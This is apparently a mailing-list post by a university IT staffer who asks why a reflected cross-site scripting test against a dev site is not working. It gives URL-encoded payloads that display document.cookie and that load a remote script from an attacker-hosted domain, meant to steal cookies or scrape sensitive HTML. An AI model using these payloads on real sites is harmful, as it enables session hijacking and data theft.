[BNM] XSS testing

[Jason Bailey]

Hi
I'm trying to hack a test/dev site (honest) and not quite got this cross 
site scripting stuff working. Any tips?

I've got:
document.location 
="http://mywebsite.com/apage.php?variable=%3Cscript%3Ealert(document.cookie);%3C/script%3E";

where mywebsite is the actual site I'm trying to hack and not the 
attacking/remote script site.

This works and I guess I could expand on this but was trying...

     document.location ="http://mywebsite.com/apage.php?variable=%3Cscript 
src='http://www.myhackycode.com/hackscript.js' %3E %3C/script%3E";

where myhackycode is the remote site hosting the JS
and I'd want to put the document.cookie stuff into hackscript.js. I'm 
actually after something else but this seems like a good test. I'm actually 
trying to scrape some HTML which could contain sensitive information.

So I've put the above in a bit of html and where the Javascript is in the 
URL it works. But in the src=... then nothing. Is this unlikely to work? 
Have i got to create an inline javascript function to call the remote JS?

Or do I just stick all my code between the <script> tags?

Jason



-- 
Jason Bailey
IT Services
University of Sussex
http://www.sussex.ac.uk/USIS/phone/details.php?id=17011